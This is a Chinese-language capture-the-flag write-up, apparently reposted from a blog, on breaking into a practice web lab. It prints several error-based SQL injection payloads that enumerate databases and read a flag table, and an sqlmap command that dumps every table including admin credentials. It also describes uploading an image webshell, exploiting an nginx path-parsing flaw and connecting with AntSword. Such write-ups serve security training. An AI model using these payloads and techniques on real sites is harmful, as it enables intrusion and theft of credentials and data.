- 前言
- 解題程序
前言
做這道題的時候,我的心情真是跌宕起伏,,為什么這么說,且聽我娓娓道來,
解題程序
打開傳送門,被傳送到這個網站
隨便點了幾個模塊,感覺都沒有可利用的漏洞,直接掃描目錄去了
掃到了admin目錄,這個應該是后臺登錄網址,打開一看果然是
一開始密碼暴力破解,沒有破解到,開始有點煩躁,
(暴力破解.jpg)這里就不放burp破解的圖了,有興趣可以自己去試
然后想是否存在sql注入繞過密碼登錄的方法,試了試
無果
那報錯注入呢?
輸入
' or gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1) #
結果還真把報錯資訊輸出到頁面上了(內心狂喜)
所有庫名一覽無遺
接著開始找flag
查找caidian里的表(因為網頁是屬于caidian目錄下的)
' or gtid_subset(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="caidian")),1) #
找到flag表了!心想flag一定在那個表里
查詢flag表的欄位
' or gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="flag" and table_schema="caidian")),1) #
查詢flag表的記錄
' or gtid_subset(concat(0x7e,(select group_concat(concat(id,':',flag)) from caidian.flag)),1) #
flag這不就拿到了嗎,簡簡單單,結果拿去提交發現,,
我還特意試了幾遍,還真不是這個flag,煩躁值再+1,這時再想了想,管理員賬號密碼應該在資料庫里把,找到賬號密碼不就可以登錄后臺了嗎,也許后臺有我要的flag,所以直接上sqlmap,找賬號密碼,
sqlmap -u "http://oovw8022.ia.aqlab.cn:8022/caidian/admin/?r=login" --data="user=12&password=123&login=yes" --technique="E" -v 3 -D caidian --tables --dump-all
找到了賬號密碼在manage表里
密碼解碼一下
可以拿去登后臺了
然后找了一圈也沒發現flag
這是逼我getshell查找網站目錄檔案內容了
想要getshell就必須找到上傳點
找到上傳點了,這里只能上傳圖片檔案,那我就上傳一個圖片馬把,至于圖片馬怎么弄自行百度把
對了,記得上傳php木馬,下面可以看到該網站使用的腳本語言和服務器,這里nginx1.15.11版本有個決議漏洞,下面會說明
直接訪問剛剛檔案的上傳點(這個上傳點地址在資料設定可以看到)http://oovw8022.ia.aqlab.cn:8022/caidian/upload/touxiang/55011641134127.jpg/.php
為什么這里要加/.php
正常訪問.jpg瀏覽器是不能決議php代碼的
但是加了/.php就能決議php代碼
這就是nginx1.15.11版本的決議漏洞,有興趣自行了解一下
直接上蟻劍,密碼是自己圖片馬的引數
成功連接
這里找了很久,從一個叫config.php檔案中,揪出了flag
拿去提交
順便提一下,第一次提交的flag好像是資訊收集2的flag,,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/402659.html
標籤:其他